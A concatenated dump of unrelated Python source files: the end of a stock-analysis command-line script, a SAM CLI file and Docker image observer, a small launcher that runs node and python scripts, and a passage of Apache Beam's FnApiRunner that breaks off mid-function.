parser.add_argument('-d', '--days', help='Days to run analysis', default=1000)
parser.add_argument('-q', '--quick', help='Run quick analysis', action='store_true')
parser.add_argument('-x', '--exit', help='Run trend analysis then exit (only valid with -t)', action='store_true')
command = vars(parser.parse_args())
if command['tickers']:
Interface(tickers=command['tickers'], days=int(command['days']), quick=command['quick'], exit=command['exit'])
else:
Interface(days=int(command['days']), quick=command['quick'])
|
file_observer.py
|
"""
Wraps watchdog to observe file system for any change.
"""
import logging
import threading
import uuid
from abc import ABC, abstractmethod
from pathlib import Path
from threading import Thread, Lock
from typing import Callable, List, Dict, Optional
import docker
from docker import DockerClient
from docker.errors import ImageNotFound
from docker.types import CancellableStream
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler, FileSystemEvent, FileSystemEventHandler
from watchdog.observers.api import ObservedWatch, BaseObserver
from samcli.cli.global_config import Singleton
from samcli.lib.utils.hash import dir_checksum, file_checksum
from samcli.lib.utils.packagetype import ZIP, IMAGE
from samcli.local.lambdafn.config import FunctionConfig
LOG = logging.getLogger(__name__)
class ResourceObserver(ABC):
@abstractmethod
def watch(self, resource: str) -> None:
"""
Start watching the input resource.
Parameters
----------
resource: str
The resource that should be observed for modifications
Raises
------
ObserverException:
if the input resource is not exist
"""
@abstractmethod
def unwatch(self, resource: str) -> None:
"""
Remove the input resource form the observed resorces
Parameters
----------
resource: str
The resource to be unobserved
"""
@abstractmethod
def start(self):
"""
Start Observing.
"""
@abstractmethod
def stop(self):
"""
Stop Observing.
"""
class ObserverException(Exception):
"""
Exception raised when unable to observe the input Lambda Function.
"""
class LambdaFunctionObserver:
"""
A class that will observe Lambda Function sources regardless if the source is code or image
"""
def __init__(self, on_change: Callable) -> None:
"""
Initialize the Image observer
Parameters
----------
on_change:
Reference to the function that will be called if there is a change in aby of the observed image
"""
self._observers: Dict[str, ResourceObserver] = {
ZIP: FileObserver(self._on_zip_change),
IMAGE: ImageObserver(self._on_image_change),
}
self._observed_functions: Dict[str, Dict[str, List[FunctionConfig]]] = {
ZIP: {},
IMAGE: {},
}
def _get_zip_lambda_function_paths(function_config: FunctionConfig) -> List[str]:
"""
Returns a list of ZIP package type lambda function source code paths
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Returns
-------
list[str]
List of lambda functions' source code paths to be observed
"""
code_paths = [function_config.code_abs_path]
if function_config.layers:
# Non-local layers will not have a codeuri property and don't need to be observed
code_paths += [layer.codeuri for layer in function_config.layers if layer.codeuri]
return code_paths
def _get_image_lambda_function_image_names(function_config: FunctionConfig) -> List[str]:
"""
Returns a list of Image package type lambda function image names
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Returns
-------
list[str]
List of lambda functions' image names to be observed
"""
return [function_config.imageuri]
self.get_resources: Dict[str, Callable] = {
ZIP: _get_zip_lambda_function_paths,
IMAGE: _get_image_lambda_function_image_names,
}
self._input_on_change: Callable = on_change
self._watch_lock: Lock = threading.Lock()
def _on_zip_change(self, paths: List[str]) -> None:
"""
It got executed once there is a change in one of the watched lambda functions' source code.
Parameters
----------
paths: list[str]
the changed lambda functions' source code paths
"""
self._on_change(paths, ZIP)
def _on_image_change(self, images: List[str]) -> None:
"""
It got executed once there is a change in one of the watched lambda functions' images.
Parameters
----------
images: list[str]
the changed lambda functions' images names
"""
self._on_change(images, IMAGE)
def _on_change(self, resources: List[str], package_type: str) -> None:
"""
It got executed once there is a change in one of the watched lambda functions' resources.
Parameters
----------
resources: list[str]
the changed lambda functions' resources (either source code path pr image names)
package_type: str
determine if the changed resource is a source code path or an image name
"""
with self._watch_lock:
changed_functions: List[FunctionConfig] = []
for resource in resources:
if self._observed_functions[package_type].get(resource, None):
changed_functions += self._observed_functions[package_type][resource]
self._input_on_change(changed_functions)
def watch(self, function_config: FunctionConfig) -> None:
"""
Start watching the input lambda function.
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Raises
------
ObserverException:
if not able to observe the input function source path/image
"""
with self._watch_lock:
if self.get_resources.get(function_config.packagetype, None):
resources = self.get_resources[function_config.packagetype](function_config)
for resource in resources:
functions = self._observed_functions[function_config.packagetype].get(resource, [])
functions += [function_config]
self._observed_functions[function_config.packagetype][resource] = functions
self._observers[function_config.packagetype].watch(resource)
def unwatch(self, function_config: FunctionConfig) -> None:
"""
Remove the input lambda function from the observed functions
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
"""
if self.get_resources.get(function_config.packagetype, None):
resources = self.get_resources[function_config.packagetype](function_config)
for resource in resources:
functions = self._observed_functions[function_config.packagetype].get(resource, [])
if function_config in functions:
functions.remove(function_config)
if not functions:
self._observed_functions[function_config.packagetype].pop(resource, None)
self._observers[function_config.packagetype].unwatch(resource)
def start(self):
"""
Start Observing.
"""
for _, observer in self._observers.items():
observer.start()
def stop(self):
"""
Stop Observing.
"""
for _, observer in self._observers.items():
observer.stop()
class ImageObserverException(ObserverException):
"""
Exception raised when unable to observe the input image.
"""
class ImageObserver(ResourceObserver):
"""
A class that will observe some docker images for any change.
"""
def __init__(self, on_change: Callable) -> None:
"""
Initialize the Image observer
Parameters
----------
on_change:
Reference to the function that will be called if there is a change in aby of the observed image
"""
self._observed_images: Dict[str, str] = {}
self._input_on_change: Callable = on_change
self.docker_client: DockerClient = docker.from_env()
self.events: CancellableStream = self.docker_client.events(filters={"type": "image"}, decode=True)
self._images_observer_thread: Optional[Thread] = None
self._lock: Lock = threading.Lock()
def _watch_images_events(self):
for event in self.events:
if event.get("Action", None) != "tag":
continue
image_name = event["Actor"]["Attributes"]["name"]
if self._observed_images.get(image_name, None):
new_image_id = event["id"]
if new_image_id != self._observed_images[image_name]:
self._observed_images[image_name] = new_image_id
self._input_on_change([image_name])
def watch(self, resource: str) -> None:
"""
Start watching the input image.
Parameters
----------
resource: str
The container image name that will be observed
Raises
------
ImageObserverException:
if the input image_name is not exist
"""
try:
image = self.docker_client.images.get(resource)
self._observed_images[resource] = image.id
except ImageNotFound as exc:
raise ImageObserverException("Can not observe non exist image") from exc
def unwatch(self, resource: str) -> None:
"""
Remove the input image form the observed images
Parameters
----------
resource: str
The container image name to be unobserved
"""
self._observed_images.pop(resource, None)
def start(self):
"""
Start Observing.
"""
with self._lock:
if not self._images_observer_thread:
self._images_observer_thread = threading.Thread(target=self._watch_images_events, daemon=True)
self._images_observer_thread.start()
def stop(self):
"""
Stop Observing.
"""
with self._lock:
self.events.close()
# wait until the images observer thread got stopped
while self._images_observer_thread and self._images_observer_thread.is_alive():
pass
class FileObserverException(ObserverException):
"""
Exception raised when unable to observe the input path.
"""
class FileObserver(ResourceObserver):
"""
A class that will Wrap the Singleton File Observer.
"""
def __init__(self, on_change: Callable) -> None:
"""
Initialize the file observer
Parameters
----------
on_change:
Reference to the function that will be called if there is a change in aby of the observed paths
"""
self._group = str(uuid.uuid4())
self._single_file_observer = SingletonFileObserver()
self._single_file_observer.add_group(self._group, on_change)
def watch(self, resource: str) -> None:
self._single_file_observer.watch(resource, self._group)
def unwatch(self, resource: str) -> None:
self._single_file_observer.unwatch(resource, self._group)
def start(self):
self._single_file_observer.start()
def stop(self):
self._single_file_observer.stop()
class SingletonFileObserver(metaclass=Singleton):
"""
A Singleton class that will observe some file system paths for any change for multiple purposes.
"""
def __init__(self) -> None:
"""
Initialize the file observer
"""
self._observed_paths_per_group: Dict[str, Dict[str, str]] = {}
self._observed_groups_handlers: Dict[str, Callable] = {}
self._observed_watches: Dict[str, ObservedWatch] = {}
self._watch_dog_observed_paths: Dict[str, List[str]] = {}
self._observer: BaseObserver = Observer()
self._code_modification_handler: PatternMatchingEventHandler = PatternMatchingEventHandler(
patterns=["*"], ignore_patterns=[], ignore_directories=False
)
self._code_deletion_handler: PatternMatchingEventHandler = PatternMatchingEventHandler(
patterns=["*"], ignore_patterns=[], ignore_directories=False
)
self._code_modification_handler.on_modified = self.on_change
self._code_deletion_handler.on_deleted = self.on_change
self._watch_lock = threading.Lock()
self._lock: Lock = threading.Lock()
def on_change(self, event: FileSystemEvent) -> None:
"""
It got executed once there is a change in one of the paths that watchdog is observing.
This method will check if any of the input paths is really changed, and based on that it will
invoke the input on_change function with the changed paths
Parameters
----------
event: watchdog.events.FileSystemEvent
Determines that there is a change happened to some file/dir in the observed paths
"""
with self._watch_lock:
LOG.debug("a %s change got detected in path %s", event.event_type, event.src_path)
for group, _observed_paths in self._observed_paths_per_group.items():
if event.event_type == "deleted":
observed_paths = [
path
for path in _observed_paths
if path == event.src_path
or path in self._watch_dog_observed_paths.get(f"{event.src_path}_False", [])
]
else:
observed_paths = [path for path in _observed_paths if event.src_path.startswith(path)]
if not observed_paths:
continue
LOG.debug("affected paths of this change %s", observed_paths)
changed_paths = []
for path in observed_paths:
path_obj = Path(path)
# The path got deleted
if not path_obj.exists():
_observed_paths.pop(path, None)
changed_paths += [path]
else:
new_checksum = calculate_checksum(path)
if new_checksum and new_checksum != _observed_paths.get(path, None):
changed_paths += [path]
_observed_paths[path] = new_checksum
else:
LOG.debug("the path %s content does not change", path)
if changed_paths:
self._observed_groups_handlers[group](changed_paths)
def add_group(self, group: str, on_change: Callable) -> None:
"""
Add new group to file observer. This enable FileObserver to watch the same path for
multiple purposes.
Parameters
----------
group: str
unique string define a new group of paths to be watched.
on_change: Callable
The method to be called in case if any path related to this group got changed.
"""
if group in self._observed_paths_per_group:
raise Exception(f"The group {group} of paths is already watched")
self._observed_paths_per_group[group] = {}
self._observed_groups_handlers[group] = on_change
def watch(self, resource: str, group: str) -> None:
"""
Start watching the input path. File Observer will keep track of the input path with its hash, to check it later
if it got really changed or not.
File Observer will send the parent path to watchdog for to be observed to avoid the missing events if the input
paths got deleted.
Parameters
----------
resource: str
The file/dir path to be observed
group: str
unique string define a new group of paths to be watched.
Raises
------
FileObserverException:
if the input path is not exist
"""
with self._watch_lock:
path_obj = Path(resource)
if not path_obj.exists():
raise FileObserverException("Can not observe non exist path")
_observed_paths = self._observed_paths_per_group[group]
_check_sum = calculate_checksum(resource)
if not _check_sum:
raise Exception(f"Failed to calculate the hash of resource {resource}")
_observed_paths[resource] = _check_sum
LOG.debug("watch resource %s", resource)
# recursively watch the input path, and all child path for any modification
self._watch_path(resource, resource, self._code_modification_handler, True)
LOG.debug("watch resource %s's parent %s", resource, str(path_obj.parent))
# watch only the direct parent path child directories for any deletion
# Parent directory watching is needed, as if the input path got deleted,
# watchdog will not send an event for it
self._watch_path(str(path_obj.parent), resource, self._code_deletion_handler, False)
def _watch_path(
self, watch_dog_path: str, original_path: str, watcher_handler: FileSystemEventHandler, recursive: bool
) -> None:
"""
update the observed paths data structure, and call watch dog observer to observe the input watch dog path
if it is not observed before
Parameters
----------
watch_dog_path: str
The file/dir path to be observed by watch dog
original_path: str
The original input file/dir path to be observed
watcher_handler: FileSystemEventHandler
The watcher event handler
recursive: bool
determines if we need to watch the path, and all children paths recursively, or just the direct children
paths
"""
# Allow watching the same path in 2 Modes recursivly, and non-recusrsivly.
# here, we need to only watch the input path in a specific recursive mode
original_watch_dog_path = watch_dog_path
watch_dog_path = f"{watch_dog_path}_{recursive}"
child_paths = self._watch_dog_observed_paths.get(watch_dog_path, [])
first_time = not bool(child_paths)
if original_path not in child_paths:
child_paths += [original_path]
self._watch_dog_observed_paths[watch_dog_path] = child_paths
if first_time:
LOG.debug("Create Observer for resource %s with recursive %s", original_watch_dog_path, recursive)
self._observed_watches[watch_dog_path] = self._observer.schedule(
watcher_handler, original_watch_dog_path, recursive=recursive
)
def unwatch(self, resource: str, group: str) -> None:
"""
Remove the input path form the observed paths, and stop watching this path.
Parameters
----------
resource: str
The file/dir path to be unobserved
group: str
unique string define a new group of paths to be watched.
"""
path_obj = Path(resource)
LOG.debug("unwatch resource %s", resource)
# unwatch input path
self._unwatch_path(resource, resource, group, True)
LOG.debug("unwatch resource %s's parent %s", resource, str(path_obj.parent))
# unwatch parent path
self._unwatch_path(str(path_obj.parent), resource, group, False)
def _unwatch_path(self, watch_dog_path: str, original_path: str, group: str, recursive: bool) -> None:
"""
update the observed paths data structure, and call watch dog observer to unobserve the input watch dog path
if it is not observed before
Parameters
----------
watch_dog_path: str
The file/dir path to be unobserved by watch dog
original_path: str
The original input file/dir path to be unobserved
group: str
unique string define a new group of paths to be watched.
recursive: bool
determines if we need to watch the path, and all children paths recursively, or just the direct children
paths
"""
# Allow watching the same path in 2 Modes recursivly, and non-recusrsivly.
# here, we need to only stop watching the input path in a specific recursive mode
original_watch_dog_path = watch_dog_path
watch_dog_path = f"{watch_dog_path}_{recursive}"
_observed_paths = self._observed_paths_per_group[group]
child_paths = self._watch_dog_observed_paths.get(watch_dog_path, [])
if original_path in child_paths:
child_paths.remove(original_path)
_observed_paths.pop(original_path, None)
if not child_paths:
self._watch_dog_observed_paths.pop(watch_dog_path, None)
if self._observed_watches.get(watch_dog_path, None):
LOG.debug("Unschedule Observer for resource %s with recursive %s", original_watch_dog_path, recursive)
self._observer.unschedule(self._observed_watches[watch_dog_path])
self._observed_watches.pop(watch_dog_path, None)
def start(self):
"""
Start Observing.
"""
with self._lock:
if not self._observer.is_alive():
self._observer.start()
def stop(self):
"""
Stop Observing.
"""
with self._lock:
if self._observer.is_alive():
self._observer.stop()
def calculate_checksum(path: str) -> Optional[str]:
try:
path_obj = Path(path)
if path_obj.is_file():
checksum = file_checksum(path)
else:
checksum = dir_checksum(path)
return checksum
except Exception:
return None
|
setup.py
|
from multiprocessing import Process
import subprocess
from setup_db import *
import time
import os
DATA_COLLECTOR_PATH = './event_listener.js'
DATA_PROCESS_PATH = './process_data.py'
def node_call(path,*args):
print(f'Node script at {path} called......')
p = subprocess.Popen(['node', path,*args], stdout=subprocess.PIPE)
out = p.stdout.read()
print(out)
def python_call(path,*args):
print(f'Python script at {path} called......')
p = subprocess.Popen(['python', path,*args], stdout=subprocess.PIPE)
out = p.stdout.read()
print(out)
if __name__=='__main__':
p1 = Process(target=node_call,args=[DATA_COLLECTOR_PATH,])
p2 = Process(target=python_call,args=[DATA_PROCESS_PATH,])
p1.start()
p2.start()
p1.join()
p2.join()
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.metrics.metricbase import MetricName
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError('All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
logging.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
logging.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or beam_runner_api_pb2.Environment(urn=python_urns.EMBEDDED_PYTHON))
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = None
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if not 'beam_fn_api' in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.blocking_append(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k, num_workers=self._num_workers
).process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
